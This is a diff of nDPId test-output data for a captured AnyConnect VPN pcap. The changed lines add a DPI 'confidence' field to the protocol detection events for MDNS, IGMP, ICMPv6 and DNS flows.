-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246981,"flow_last_seen":1569687246981,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1569687246981,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}}
+00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246981,"flow_last_seen":1569687246981,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1569687246981,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246982,"flow_last_seen":1569687246982,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1569687246982,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00616{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1569687246982,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":174,"pkt_l4_len":120,"ts_msec":1569687246982,"pkt":"MzMAAAD7GIEORo7Iht1gBoi5AHgR\/\/6AAAAAAAAABAg+RTq8FVL\/AgAAAAAAAAAAAAAAAAD7FOkU6QB4u70AAAAAAAMAAAAAAAEPX2NvbXBhbmlvbi1saW5rBF90Y3AFbG9jYWwAAAyAAQhfaG9tZWtpdMAcAAyAAQxfc2xlZXAtcHJveHkEX3VkcMAhAAyAAQAAKQWgAAARlAASAAQADgCaOoEORo7IGIEORo7I"}
-00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246982,"flow_last_seen":1569687246982,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1569687246982,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}}
+00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246982,"flow_last_seen":1569687246982,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1569687246982,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}}
 00534{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":98,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246982,"flow_last_seen":1569687246982,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1569687246982,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.2","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
 00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1569687246982,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"ts_msec":1569687246982,"pkt":"AQBeAAACGIEORo7ICABGAAAgLwcAAAECCvoKAADV4AAAApQEAAAXAAgE4AAA+w=="}
-00567{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246982,"flow_last_seen":1569687246982,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1569687246982,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.2","l4_proto":2,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00593{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246982,"flow_last_seen":1569687246982,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1569687246982,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.2","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
 00536{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246982,"flow_last_seen":1569687246982,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1569687246982,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
 00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1569687246982,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"ts_msec":1569687246982,"pkt":"AQBeAAD7GIEORo7ICABGAAAg0EsAAAECaLwKAADV4AAA+5QEAAAWAAkE4AAA+w=="}
-00569{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246982,"flow_last_seen":1569687246982,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1569687246982,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00595{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246982,"flow_last_seen":1569687246982,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1569687246982,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":102,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687247192,"flow_last_seen":1569687247192,"flow_idle_time":180000,"flow_min_l4_payload_len":232,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":232,"midstream":0,"ts_msec":1569687247192,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.213","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00749{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1569687247192,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"ts_msec":1569687247192,"pkt":"GIEORo7INDY7z3UoCABFAAEE6tAAAP8RumAKAADjCgAA1RTpFOkA8ADKAACEAAAAAAEAAAAED19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEAABGUABQRTFAtUktFUlVSLU9TWCAoOSnADMAyACGAAQAAAHgADQAAAADbaQRuRFBJwCHAMgAQgAEAABGUACIWcnBCQT0zNzoyRTo0Nzo2RDoxODo1NApycFZyPTE1Mi4xEUxQLVJLRVJVUi1PU1ggKDkpDF9kZXZpY2UtaW5mb8AcABAAAQAAEZQAIBRtb2RlbD1NYWNCb29rUHJvMTEsMQpvc3h2ZXJzPTE3wFgAAYABAAAAeAAECgAA4w=="}
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687247192,"flow_last_seen":1569687247192,"flow_idle_time":180000,"flow_min_l4_payload_len":232,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":232,"midstream":0,"ts_msec":1569687247192,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.213","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}}
+00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687247192,"flow_last_seen":1569687247192,"flow_idle_time":180000,"flow_min_l4_payload_len":232,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":232,"midstream":0,"ts_msec":1569687247192,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.213","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}}
 00558{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1569687247306,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":129,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":129,"pkt_l4_len":95,"ts_msec":1569687247306,"pkt":"LH6BsEqhNDY7z3UoCABFAABzAABAAEAGB9AKAADjNCXzrd5SAbt7aDM3a\/IufIAYEAAjBQAAAQEIChwNgekCYGB5FwMDADoAAAAAAAAABP6P4Nbq7ON\/6\/AGxu6nGVDbyH\/VD4ZdKbxLWPLfwYcNeZogzNp7TOtgIRax\/b1ZBFBO"}
 00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1569687247306,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":129,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":129,"pkt_l4_len":95,"ts_msec":1569687247306,"pkt":"LH6BsEqhNDY7z3UoCABFAABzAABAAEAGB9AKAADjNCXzrd5TAbsf\/fAfcO3V5YAYEADtVwAAAQEIChwNgekAjYToFwMDADoAAAAAAAAABVQHVjyN4wBxs8m+2i54okht8UdFndDP4vwtKiUe9j1LvsBOOnvld8r5j6XDOjeRQG2g"}
 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":111,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687247596,"flow_last_seen":1569687247596,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1569687247596,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1569687247596,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"ts_msec":1569687247596,"pkt":"MzMAAAAWGIEORo7Iht1gAAAAACQAAf6AAAAAAAAABAg+RTq8FVL\/AgAAAAAAAAAAAAAAAAAWOgABAAUCAACPANy0AAAAAQQAAAD\/AgAAAAAAAAAAAAAAAAD7"}
-00593{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687247596,"flow_last_seen":1569687247596,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1569687247596,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687247596,"flow_last_seen":1569687247596,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1569687247596,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1569687247596,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":174,"pkt_l4_len":120,"ts_msec":1569687247596,"pkt":"MzMAAAABLH6BsEqhht1gAAAAAHg6\/\/6AAAAAAAAALn6B\/\/6wSqH\/AgAAAAAAAAAAAAAAAAABhgBH5kDAALQAAAAAAAAAABkFAAAAAVGAIAEFWP7tAAAAAAAAAAAAASABBVj+7QAAAAAAAAAAAAIDBEDAAAL9HQAC\/R0AAAAAJgEGRoQCRLAAAAAAAAAAABgDAAAAAAC0AAAAAAAAAAAAAAAAAAAAAAEBLH6BsEqh"}
 00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1569687248005,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"ts_msec":1569687248005,"pkt":"AQBeAAD7GIEORo7ICABFAACszwUAAP8RAGsKAADV4AAA+xTpFOkAmDTQAAAAAAADAAEAAAABD19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEIX2hvbWVraXTAHAAMAAEMX3NsZWVwLXByb3h5BF91ZHDAIQAMAAHADAAMAAEAAA4QABQRTFAtUktFUlVSLU9TWCAoOSnADAAAKQWgAAARlAASAAQADgCaOoEORo7IGIEORo7I"}
 00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1569687248006,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":206,"pkt_l4_len":152,"ts_msec":1569687248006,"pkt":"MzMAAAD7GIEORo7Iht1gBoi5AJgR\/\/6AAAAAAAAABAg+RTq8FVL\/AgAAAAAAAAAAAAAAAAD7FOkU6QCYj8YAAAAAAAMAAQAAAAEPX2NvbXBhbmlvbi1saW5rBF90Y3AFbG9jYWwAAAwAAQhfaG9tZWtpdMAcAAwAAQxfc2xlZXAtcHJveHkEX3VkcMAhAAwAAcAMAAwAAQAADhAAFBFMUC1SS0VSVVItT1NYICg5KcAMAAApBaAAABGUABIABAAOAJo6gQ5GjsgYgQ5Gjsg="}
@@ -103,20 +103,20 @@
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1569687249631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569687249631,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0uJpAADgGjuC4GThNCgAA4wBQ3lUJPUQ9aK+croAQAOvt6gAAAQEICuMU+IIcDWN7"}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687251177,"flow_last_seen":1569687251177,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1569687251177,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":54851,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1569687251177,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1569687251177,"pkt":"LH6BsEqhNDY7z3UoCABFAAA+HQ0AAP8R\/CcKAADjS0tMTNZDADUAKtGSphcBAAABAAAAAAAABXByaW50BnZpYXNhdANjb20AAAEAAQ=="}
-00740{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687251177,"flow_last_seen":1569687251177,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1569687251177,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":54851,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"print.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687251177,"flow_last_seen":1569687251177,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1569687251177,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":54851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"print.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00594{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1569687251230,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":157,"pkt_l4_len":123,"ts_msec":1569687251230,"pkt":"NDY7z3UoLH6BsEqhCABFAACPAABAADYRoeRLS0xMCgAA4wA11kMAe\/FSpheBgwABAAAAAQAABXByaW50BnZpYXNhdANjb20AAAEAAcASAAYAAQAAA4QARQZucy02MzIJYXdzZG5zLTE1A25ldAARYXdzZG5zLWhvc3RtYXN0ZXIGYW1hem9uwBkAAAABAAAcIAAAA4QAEnUAAAFRgA=="}
-00750{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":122,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687251177,"flow_last_seen":1569687251230,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":74,"midstream":0,"ts_msec":1569687251230,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":54851,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"print.viasat.com","num_queries":1,"num_answers":1,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":122,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687251177,"flow_last_seen":1569687251230,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":74,"midstream":0,"ts_msec":1569687251230,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":54851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"print.viasat.com","num_queries":1,"num_answers":1,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":127,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687255989,"flow_last_seen":1569687255989,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1569687255989,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":58155,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1569687255989,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1569687255989,"pkt":"LH6BsEqhNDY7z3UoCABFAAA3enMAAP8RnsgKAADjS0tMTOMrADUAI5+UjycBAAABAAAAAAAABXNsYWNrA2NvbQAAAQAB"}
-00745{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687255989,"flow_last_seen":1569687255989,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1569687255989,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":58155,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Slack","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"slack.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687255989,"flow_last_seen":1569687255989,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1569687255989,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":58155,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Slack","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"slack.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1569687256018,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"ts_msec":1569687256018,"pkt":"NDY7z3UoLH6BsEqhCABFAABHAABAADcRoSxLS0xMCgAA4wA14ysAM\/asjyeBgAABAAEAAAAABXNsYWNrA2NvbQAAAQABwAwAAQABAAAAIwAEY1YinA=="}
-00758{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687255989,"flow_last_seen":1569687256018,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1569687256018,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":58155,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Slack","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"slack.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"99.86.34.156"}}
